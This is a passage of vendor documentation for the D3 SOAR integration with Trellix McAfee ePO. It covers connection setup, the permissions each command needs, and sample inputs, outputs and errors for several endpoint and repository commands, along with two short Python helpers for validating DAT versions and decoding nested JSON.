
Trellix McAfee ePO

Overview

McAfee ePolicy Orchestrator (McAfee ePO) centralizes and streamlines the management of endpoint, network, data security, and compliance solutions.

D3 SOAR provides REST operations for working with Trellix McAfee ePO.

Trellix McAfee ePO is available for use in:

D3 SOAR

V12.7.83.0+

Category

Endpoint Security

Deployment Options

Option I, Option III

Connection

To connect to Trellix McAfee ePO from D3 SOAR, collect the required information below:

| Parameter | Description | Example |
|---|---|---|
| Server URL | The URL of the Trellix McAfee ePO server. | https://1.1.1.1:8443 |
| Username | The username for authentication. | admin |
| Password | The password for authentication. | D**ec**it** |

Permission Requirements

Each endpoint in the Trellix McAfee ePO API requires a certain permission scope. The following are required scopes for the commands in this integration:

| Command | Permission Set | Required Permissions |
|---|---|---|
| Add Tag | N/A | Administrator |
| Assign Policy To System | N/A | Administrator |
| Check Latest DAT | Software | Master Repository: View packages |
| | | Distributed Repository: View repositories |
| Check Repository Compliance | Software | Master Repository: View packages |
| | | Distributed Repository: View repositories |
| Determine Repository | Software | Master Repository: View packages |
| | | Distributed Repository: View repositories |
| Fetch Event | Queries and Reports | Queries and Reports: Use public groups; create and edit private queries/reports |
| Find Client Task | McAfee Agent | McAfee Agent (Tasks): View settings |
| Find Group | System Tree access | Select My Organization |
| Find Groups | System Tree access | Select My Organization |
| Find Package | Software | Master Repository: View packages |
| Find Policy | Data Loss Prevention | DLP Policies: User can view all DLP policies in policy catalog |
| | | Definitions (Permissions): Select full access for all permissions |
| | | Classification (Actions): Manage manual classifications, Registered documents and whitelisted text |
| | | Classifications (Permissions): Full permissions |
| | | DLP Policy Manager (Rule Sets Access Control): Full permissions |
| | | DLP Policy Manager (Rule Types): Data Protection, Device Control, Discovery |
| Find Repository | Software | Master Repository: View packages |
| | | Distributed Repositories: View repositories |
| | | (These permissions return only limited information; only Administrator access can return all repositories.) |
| Find System | Systems | System Tree: View "System Tree" tab |
| Find System By Tag Name | Queries and Reports | Queries and Reports: Use public groups |
| Find System In Group | Queries and Reports | Queries and Reports: Use public groups |
| | System Tree access | Select My Organization |
| Find Systems By Group IDs | Queries and Reports | Queries and Reports: Use public groups |
| | System Tree access | Select My Organization |
| Find Tag | Systems | Tag use: Apply, exclude, and clear tags |
| Get Device Info | Queries and Reports | Queries and Reports: Use public groups |
| | System Tree access | Select My Organization |
| Get DLP Incident | Incident Management | Incident Access by Type: Data Protection, Device Control, Endpoint Discovery, Network Discovery |
| | | Incident Access by Reviewer (advanced): User can view all incidents, User can view incidents with external reviewer (Reported by MVISION Cloud) |
| | | Evidence File Access: User can view evidence files, User can view match string files |
| | | Incident Tasks: User can create a Mail Notification task, User can create a Purge notification task, User can create a Set Reviewer task |
| | | Incident Data Redaction: Supervisor permission |
| | Queries and Reports | Queries and Reports: Use public groups; create and edit private queries/reports. |
| Get Task Info By Product Object | Endpoint Security Threat Prevention | Endpoint Security Threat Prevention (Tasks): View settings |
| Get Threat Events | Queries and Reports | Queries and Reports: Use public groups |
| | Threat Event Log | Threat Event Log: View events |
| Get Version | N/A | Administrator |
| List All Server Task | Server tasks | Server tasks: View Scheduler tasks; view Scheduler task results in the Server Task Log |
| List Database | N/A | Administrator |
| List Data Type | Queries and Reports | Queries and Reports: Use public groups |
| List Permission Set | N/A | Administrator |
| List Query | Queries and Reports | Queries and Reports: Use public groups |
| List Repository | Software | Master Repository: View packages |
| | | Distributed Repository: View repositories |
| List Running Server Task | Server tasks | Server tasks: View Scheduler tasks; view Scheduler task results in the Server Task Log |
| List Sub Task History | Server tasks | Server tasks: View Scheduler tasks; view Scheduler task results in the Server Task Log |
| List Table | Queries and Reports | Queries and Reports: Use public groups; create and edit private queries/reports. |
| List Task History | Server tasks | Server tasks: View Scheduler tasks; view Scheduler task results in the Server Task Log |
| List User | N/A | Administrator |
| Remove Tag | N/A | Administrator |
| Repo List | Software | Master Repository: View packages |
| | | Distributed Repository: View repositories |
| Retrieve Current DAT Version | Software | Master Repository: View packages |
| | | Distributed Repository: View repositories |
| Run Client Task | N/A | Administrator |
| Scan End Point By IP | Software | Master Repository: View packages |
| | | Distributed Repository: View repositories |
| Scan End Points By Group Name | System Tree access | Select My Organization |
| Scan End Points By Tag Name | N/A | Administrator |
| Search Threat Events | N/A | Administrator |
| Update Endpoints | N/A | Administrator |
| Update Repository | N/A | Administrator |
| Wake Up Agent | Systems | Actions: Wake up agents; view Agent Activity Log |
| Test Connection | N/A | No permissions needed |

Because Trellix McAfee ePO uses role-based access control (RBAC), the D3 connector is generated for a specific user account and the application. The command permissions are therefore inherited from the user account’s role. Users need to configure their user profile in the Trellix McAfee ePO console for each command in this integration.

Reader Note

  • The Administrator role is required to run certain commands. Refer to step 3d of the Creating a User section for more information.

  • The Find Repository command requires the Administrator role to retrieve all results. The minimum permissions listed in the table above will only yield partial results.

Configuring Trellix McAfee ePO to Work with D3 SOAR

Creating a User

  1. Once logged into your Trellix McAfee ePO environment, navigate to User Management > Users.

  2. Click on New User.

  3. Configure the new user.

    1. Enter a user name. This will be the username used to establish and authenticate your connection in D3 SOAR.

    2. Determine whether to enable or disable the logon status for this account. If the account is for someone who is not yet part of the organization, disabling it might be preferable.

    3. Select ePO authentication. Enter a temporary password for the user account. The password, which must be changed upon initial login, will also be used to establish and authenticate your connection in D3 SOAR.

    4. Decide whether to grant administrative privileges or select appropriate permission sets for the user.

  4. Click Save to complete the process.

Adding and Editing a Permission Set

  1. Once logged into your Trellix McAfee ePO environment, navigate to User Management > Permission Sets.

  2. Add or edit a permission set.

    • Add a permission set:

      1. Click New Permission Set.

      2. Enter a unique name for the new permission set.

      3. Assign specific users to this permission set by selecting their usernames.

      4. Click Save.

    • Edit a permission set:

      1. Select the desired permission set to modify.

      2. Locate the Name and users permission. Click Edit to add or remove permissions to the user. Click Save.

      3. Repeat the same steps to modify other permissions within the permission set.

Configuring D3 SOAR to Work with Trellix McAfee ePO

  1. Log in to D3 SOAR.

  2. Find the Trellix McAfee ePO integration.

    1. Navigate to Configuration on the top header menu.

    2. Click on the Integration icon on the left sidebar.

    3. Type Trellix McAfee ePO in the search box to find the integration, then click it to select it.

    4. Click + New Connection, on the right side of the Connections section. A new connection window will appear.

  3. Configure the following fields to create a connection to Trellix McAfee ePO.

    1. Connection Name: The desired name for the connection.

    2. Site: Specifies the site to use the integration connection. Use the drop-down menu to select the site. The Share to Internal Sites option enables all sites defined as internal sites to use the connection. Selecting a specific site will only enable that site to use the connection.

    3. Recipient site for events from connections Shared to Internal Sites: This field appears if you selected Share to Internal Sites for Site to let you select the internal site to deploy the integration connection.

    4. Agent Name (Optional): Specifies the proxy agent required to build the connection. Use the dropdown menu to select the proxy agent from a list of previously configured proxy agents.

    5. Description (Optional): Add your desired description for the connection.

    6. Tenant (Optional): When configuring the connection from a master tenant site, you have the option to choose the specific tenant sites you want to share the connection with. Once you enable this setting, you can filter and select the desired tenant sites from the dropdowns to share the connection.

    7. Configure User Permissions: Defines which users have access to the connection.

    8. Active: Check the tick box to ensure the connection is available for use.

    9. System: This section contains the parameters defined specifically for the integration. These parameters must be configured to create the integration connection.
      1. Input the Server URL of your Trellix McAfee ePO environment.
      2. Input your Username.
      3. Input your Password.

    10. Enable Password Vault: An optional feature that allows users to take the stored credentials from their own password vault. Please refer to the password vault connection guide if needed.

  4. Test the connection.

    1. Click Test Connection to verify the account credentials and network connection. If the Test Connection Passed alert window appears, the test connection is successful. You will see Passed with a green checkmark appear beside the Test Connection button. If the test connection fails, please check your connection parameters and try again.

    2. Click OK to close the alert window.

    3. Click + Add to create and add the configured connection.

Commands

Trellix McAfee ePO includes the following executable commands for users to set up schedules or create playbook workflows. With the Test Command, you can execute these commands independently for playbook troubleshooting.

Integration API Note

For more information about the Trellix McAfee ePO API, please refer to the Trellix McAfee ePO API reference.

Reader Note

Certain permissions are required for each command. Please refer to the Permission Requirements and Configuring Trellix McAfee ePO to Work with D3 SOAR for details.

Note for Time-related parameters

The input format of time-related parameters may vary based on your account settings. As a result, the sample data provided in our commands may be different from what you see. To set your preferred time format, follow these steps:

  1. Navigate to Configuration > Application Settings. Select Date/Time Format.

  2. Choose your desired date and time format.

After that, you will be able to view your preferred time format when configuring the DateTime input parameters for commands.

Add Tag

Adds a tag to an endpoint in McAfee ePO.

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| Endpoint | Required | The endpoint to add a tag to. | dc_auto_mtrg |
| Tag Name | Required | The name of the tag to add to the specified endpoint. | YABINGUO |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "Status": "Tag DC_AUTO_MTRG has been applied to 1 endpoint(s) successfully."
}
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "Status": "Tag DC_AUTO_MTRG has been applied to 1 endpoint(s) successfully."
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"{\\\"Status\\\":\\\"Tag SERVER has been applied to 0 endpoint(s) successfully.\\\"}\\r\\n\"",
    "Status": "\"Tag DC_AUTO_MTRG has been applied to 1 endpoint(s) successfully.\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

Status

Tag DC_AUTO_MTRG has been applied to 1 endpoint(s) successfully.

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Add Tag failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 400. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Error 0 :\r\n\r\n. |

Error Sample Data

Add Tag failed.

Status Code: 400.

Message: Error 0 :\r\n\r\n.

Assign Policy To System

Assigns a policy to specified endpoints.

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| Endpoints | Required | The list of endpoints to assign a policy to. | d*****-dc |
| Product ID | Required | The product ID to assign to the specified endpoints. | 1 |
| Type ID | Required | The type ID to assign to the specified endpoints. | 69 |
| Object ID | Required | The object ID to assign to the specified endpoints. | 1 |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "results": [
        {
            "name": "d*****-dc",
            "id": "*****",
            "message": "Assign policy succeeded",
            "status": 0
        }
    ]
}
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "results": [
        {
            "name": "d*****-dc",
            "id": "*****",
            "message": "Assign policy succeeded",
            "status": 0
        }
    ]
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"{\\r\\n    \\\"results\\\": [\\r\\n        {\\r\\n            \\\"name\\\": \\\"*****-dc\\\",\\r\\n            \\\"id\\\": \\\"*****\\\",\\r\\n            \\\"message\\\": \\\"Assign policy succeeded\\\",\\r\\n            \\\"status\\\": 0\\r\\n        }\\r\\n    ]\\r\\n}\"",
    "results": "\"[\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"*****-dc\\\",\\r\\n \\r\\n  \\\"id\\\": \\\"*****\\\",\\r\\n \\r\\n  \\\"message\\\": \\\"Assign policy succeeded\\\",\\r\\n \\r\\n  \\\"status\\\": 0\\r\\n \\r\\n  }\\r\\n \\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

results

{
    "name": "*****-dc",
    "id": "*****",
    "message": "Assign policy succeeded",
    "status": 0
}

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Assign Policy To System failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 404. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unable to take action on the computer because it may not exist. |

Error Sample Data

Assign Policy To System failed.

Status Code: 404.

Message: Unable to take action on the computer because it may not exist.

Check Latest DAT

Returns the latest DAT version.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "LatestDATVersion": "9524"
}
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "LatestDATVersion": "9524"
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "LatestDATVersion": "\"9524\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

LatestDATVersion

9524

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Check Latest DAT failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Check Latest DAT failed.

Status Code: 401.

Message: Unauthorized.

Check Repository Compliance

Checks repository compliance based on the specified DAT version.

Reader Note

Required DAT Version is a required parameter to run this command.

  • The latest Required DAT Version can be found from the Check Latest DAT command in the returned raw data at the path $.LatestDATVersion.
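The chaining described in this note, as an added Python example that is not part of D3's documentation: it validates a Required DAT Version before use (the error sample for this command, "could not convert string to float", points at non-numeric input) and flags a compliance result that was checked against a baseline older than the latest DAT. The function names and the accepted version pattern are assumptions; the inputs are the Raw Data samples from this page.

```python
import json
import re
from decimal import Decimal

# Constructed inputs: the Raw Data samples shown on this page for
# Check Latest DAT and Check Repository Compliance.
LATEST_RAW = '{"LatestDATVersion": "9524"}'
COMPLIANCE_RAW = (
    '{"CurrentDATVersion": "9534.0000", '
    '"RequiredDATVersion": "9472", "Status": "OK"}'
)

# Assumption: a DAT version is digits with an optional fractional part,
# the only two shapes that appear in the samples ("9524", "9534.0000").
DAT_PATTERN = re.compile(r"\d+(\.\d+)?")


def validate_dat_input(text):
    """Return a cleaned DAT version string or raise ValueError.

    Run this on a value before it is used as Required DAT Version so that
    free text never reaches the command.
    """
    if not isinstance(text, str):
        raise ValueError(f"DAT version must be a string, got {type(text).__name__}")
    cleaned = text.strip()
    if not DAT_PATTERN.fullmatch(cleaned):
        raise ValueError(f"not a DAT version: {text!r}")
    return cleaned


def dat_number(text):
    """Numeric value of a DAT version, so "9534.0000" equals "9534"."""
    return Decimal(validate_dat_input(text))


def review_compliance(latest_raw, compliance_raw):
    """Cross-check a compliance result against the latest DAT version."""
    latest_text = json.loads(latest_raw)["LatestDATVersion"]  # $.LatestDATVersion
    latest = dat_number(latest_text)
    result = json.loads(compliance_raw)
    current = dat_number(result["CurrentDATVersion"])
    required = dat_number(result["RequiredDATVersion"])

    findings = []
    if current < required:
        findings.append("repository_below_required")
    if required < latest:
        # The check ran against an older baseline than the latest DAT,
        # so an "OK" status says nothing about the latest version.
        findings.append("baseline_stale")
    if current < latest:
        findings.append("repository_behind_latest")
    return {
        "status": result.get("Status"),
        "required_input": validate_dat_input(latest_text),
        "findings": findings,
    }


if __name__ == "__main__":
    print(review_compliance(LATEST_RAW, COMPLIANCE_RAW))
```
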

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| Required DAT Version | Required | The DAT version number to check repository compliance. | 9472 |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
    "CurrentDATVersion": "9534.0000",
    "RequiredDATVersion": "9472",
    "Status": "OK"
}
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
    "CurrentDATVersion": "9534.0000",
    "RequiredDATVersion": "9472",
    "Status": "OK"
}
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "CurrentDATVersion": "\"9534.0000\"",
    "RequiredDATVersion": "\"9472\"",
    "Status": "\"OK\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

| CurrentDATVersion | RequiredDATVersion | Status |
|---|---|---|
| 9534.0000 | 9472 | OK |

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Check Repository Compliance failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 400. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: could not convert string to float. |

Error Sample Data

Check Repository Compliance failed.

Status Code: 400.

Message: could not convert string to float.

Determine Repository

Returns details of the specified repository.

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| Repository Name | Required | The name of the repository to retrieve details. | ePO_***-AD |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "SAServerDNS": "",
        "disableV1DATReplication": false,
        "spipeServerDNS": null,
        "repositoryTypeString": "master",
        "useAnonCreds": false,
        "downloadCredPassword": "",
        "downloadCredDomain": "",
        "lockType": 0,
        "enabled": true,
        "uncUseLoggedOnUser": false,
        "uncOrder": "1",
        "protocol": 1,
        "lockedBy": "",
        "softwareInclusionList": [],
        "uploadCredUsername": "",
        "spipeVersion": "4.5.0",
        "SAServerNetbios": "",
        "protocolString": "SpipeSite",
        "disableFullDATReplication": false,
        "replicationUNC": "",
        "SAServerIP": "",
        "addressType": null,
        "autoID": 3,
        "softwareExclusionList": null,
        "repositoryTypeAsString": null,
        "repositoryName": "ePO_***-AD",
        "spipeServerName": "***-AD",
        "uploadCredDomain": "",
        "repositoryPort": 80,
        "downloadPasswordEncrypted": true,
        "httpUseAuth": false,
        "downloadCredUsername": "",
        "includeAllSoftware": true,
        "repositoryId": "ePO_***-AD",
        "repositoryType": 2,
        "location": "***-AD/Software",
        "updateExclusionList": true,
        "spipeServerIP": "1.1.1.1",
        "uploadCredPassword": "",
        "fallback": false,
        "repliPasswordEncrypted": true
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "SAServerDNS": "",
        "disableV1DATReplication": false,
        "spipeServerDNS": null,
        "repositoryTypeString": "master",
        "useAnonCreds": false,
        "downloadCredPassword": "",
        "downloadCredDomain": "",
        "lockType": 0,
        "enabled": true,
        "uncUseLoggedOnUser": false,
        "uncOrder": "1",
        "protocol": 1,
        "lockedBy": "",
        "softwareInclusionList": [],
        "uploadCredUsername": "",
        "spipeVersion": "4.5.0",
        "SAServerNetbios": "",
        "protocolString": "SpipeSite",
        "disableFullDATReplication": false,
        "replicationUNC": "",
        "SAServerIP": "",
        "addressType": null,
        "autoID": 3,
        "softwareExclusionList": null,
        "repositoryTypeAsString": null,
        "repositoryName": "ePO_***-AD",
        "spipeServerName": "***-AD",
        "uploadCredDomain": "",
        "repositoryPort": 80,
        "downloadPasswordEncrypted": true,
        "httpUseAuth": false,
        "downloadCredUsername": "",
        "includeAllSoftware": true,
        "repositoryId": "ePO_***-AD",
        "repositoryType": 2,
        "location": "***-AD/Software",
        "updateExclusionList": true,
        "spipeServerIP": "1.1.1.1",
        "uploadCredPassword": "",
        "fallback": false,
        "repliPasswordEncrypted": true
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[\\r\\n    {\\r\\n        \\\"SAServerDNS\\\": \\\"\\\",\\r\\n        \\\"disableV1DATReplication\\\": false,\\r\\n        \\\"spipeServerDNS\\\": null,\\r\\n        \\\"repositoryTypeString\\\": \\\"master\\\",\\r\\n        \\\"useAnonCreds\\\": false,\\r\\n        \\\"downloadCredPassword\\\": \\\"\\\",\\r\\n        \\\"downloadCredDomain\\\": \\\"\\\",\\r\\n        \\\"lockType\\\": 0,\\r\\n        \\\"enabled\\\": true,\\r\\n        \\\"uncUseLoggedOnUser\\\": false,\\r\\n        \\\"uncOrder\\\": \\\"1\\\",\\r\\n        \\\"protocol\\\": 1,\\r\\n        \\\"lockedBy\\\": \\\"\\\",\\r\\n        \\\"softwareInclusionList\\\": [],\\r\\n        \\\"uploadCredUsername\\\": \\\"\\\",\\r\\n        \\\"spipeVersion\\\": \\\"4.5.0\\\",\\r\\n        \\\"SAServerNetbios\\\": \\\"\\\",\\r\\n        \\\"protocolString\\\": \\\"SpipeSite\\\",\\r\\n        \\\"disableFullDATReplication\\\": false,\\r\\n        \\\"replicationUNC\\\": \\\"\\\",\\r\\n        \\\"SAServerIP\\\": \\\"\\\",\\r\\n        \\\"addressType\\\": null,\\r\\n        \\\"autoID\\\": 3,\\r\\n        \\\"softwareExclusionList\\\": null,\\r\\n        \\\"repositoryTypeAsString\\\": null,\\r\\n        \\\"repositoryName\\\": \\\"ePO_***-AD\\\",\\r\\n        \\\"spipeServerName\\\": \\\"D3Lab-AD\\\",\\r\\n        \\\"uploadCredDomain\\\": \\\"\\\",\\r\\n        \\\"repositoryPort\\\": 80,\\r\\n        \\\"downloadPasswordEncrypted\\\": true,\\r\\n        \\\"httpUseAuth\\\": false,\\r\\n        \\\"downloadCredUsername\\\": \\\"\\\",\\r\\n        \\\"includeAllSoftware\\\": true,\\r\\n        \\\"repositoryId\\\": \\\"ePO_***-AD\\\",\\r\\n        \\\"repositoryType\\\": 2,\\r\\n        \\\"location\\\": \\\"D3Lab-AD/Software\\\",\\r\\n        \\\"updateExclusionList\\\": true,\\r\\n        \\\"spipeServerIP\\\": \\\"192.168.82.10\\\",\\r\\n        \\\"uploadCredPassword\\\": \\\"\\\",\\r\\n        \\\"fallback\\\": false,\\r\\n        \\\"repliPasswordEncrypted\\\": true\\r\\n    }\\r\\n]\"",
    "disableV1DATReplication": "\"[\\r\\n \\r\\n  false\\r\\n \\r\\n ]\"",
    "location": "\"[\\r\\n \\r\\n  \\\"****-AD/Software\\\"\\r\\n \\r\\n ]\"",
    "protocolString": "\"[\\r\\n \\r\\n  \\\"SpipeSite\\\"\\r\\n \\r\\n ]\"",
    "repositoryId": "\"[\\r\\n \\r\\n  \\\"ePO_***-AD\\\"\\r\\n \\r\\n ]\"",
    "repositoryName": "\"[\\r\\n \\r\\n  \\\"ePO_***-AD\\\"\\r\\n \\r\\n ]\"",
    "repositoryPort": "\"[\\r\\n \\r\\n  80\\r\\n \\r\\n ]\"",
    "repositoryType": "\"[\\r\\n \\r\\n  2\\r\\n \\r\\n ]\"",
    "spipeServerIP": "\"[\\r\\n \\r\\n  \\\"1.1.1.1\\\"\\r\\n \\r\\n ]\"",
    "spipeServerName": "\"[\\r\\n \\r\\n  \\\"***-AD\\\"\\r\\n \\r\\n ]\"",
    "spipeVersion": "\"[\\r\\n \\r\\n  \\\"4.5.0\\\"\\r\\n \\r\\n ]\""
}
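In the Key Fields samples on this page, each value is a JSON string that itself contains JSON text, sometimes two layers deep. The following added Python example, which is not part of D3's documentation, peels those layers before a value is used as a playbook task input and only passes on values that parse as IP addresses. The function names are assumptions; the input is constructed from the Key Fields samples above.

```python
import ipaddress
import json

# Constructed input: Key Fields entries copied from the samples on this page
# (Add Tag, Check Repository Compliance, Determine Repository).
KEY_FIELDS_JSON = r'''
{
    "Output": "\"{\\\"Status\\\":\\\"Tag SERVER has been applied to 0 endpoint(s) successfully.\\\"}\\r\\n\"",
    "CurrentDATVersion": "\"9534.0000\"",
    "Status": "\"OK\"",
    "repositoryPort": "\"[\\r\\n \\r\\n  80\\r\\n \\r\\n ]\"",
    "spipeServerIP": "\"[\\r\\n \\r\\n  \\\"1.1.1.1\\\"\\r\\n \\r\\n ]\""
}
'''


def unwrap(value, max_layers=4):
    """Peel JSON string layers until the value is no longer encoded JSON.

    Only text that starts with a quote, '[' or '{' is decoded, so "9534.0000"
    stays a string instead of silently turning into the float 9534.0.
    """
    for _ in range(max_layers):
        if not isinstance(value, str):
            break
        text = value.strip()
        if not text or text[0] not in '"[{':
            break
        try:
            value = json.loads(text)
        except json.JSONDecodeError:
            break  # ordinary text that merely starts with such a character
    return value


def decode_key_fields(document):
    """Decode a Key Fields JSON document into plain Python values."""
    return {key: unwrap(value) for key, value in json.loads(document).items()}


def ip_values(decoded, key):
    """Return the entries under `key` that parse as IP addresses."""
    value = decoded.get(key)
    items = value if isinstance(value, list) else [value]
    valid = []
    for item in items:
        if not isinstance(item, str):
            continue  # ip_address() would accept the integer 80 as 0.0.0.80
        try:
            valid.append(str(ipaddress.ip_address(item.strip())))
        except ValueError:
            continue  # not an address: do not pass it on as an indicator
    return valid


if __name__ == "__main__":
    fields = decode_key_fields(KEY_FIELDS_JSON)
    for name, value in fields.items():
        print(f"{name}: {value!r}")
    print("IPs:", ip_values(fields, "spipeServerIP"))
```
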
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

SAServerDNS

disableV1DATReplication

spipeServerDNS

repositoryTypeString

useAnonCreds

downloadCredPassword

downloadCredDomain

lockType

enabled

uncUseLoggedOnUser

uncOrder

protocol

lockedBy

softwareInclusionList

uploadCredUsername

spipeVersion

SAServerNetbios

protocolString

disableFullDATReplication

replicationUNC

SAServerIP

addressType

autoID

softwareExclusionList

repositoryTypeAsString

repositoryName

spipeServerName

uploadCredDomain

repositoryPort

downloadPasswordEncrypted

httpUseAuth

downloadCredUsername

includeAllSoftware

repositoryId

repositoryType

location

updateExclusionList

spipeServerIP

uploadCredPassword

fallback

repliPasswordEncrypted

False

master

False

0

True

False

1

1

[]

4.5.0

SpipeSite

False

3

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including the Failure Indicator, Status Code, and Message. These details can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
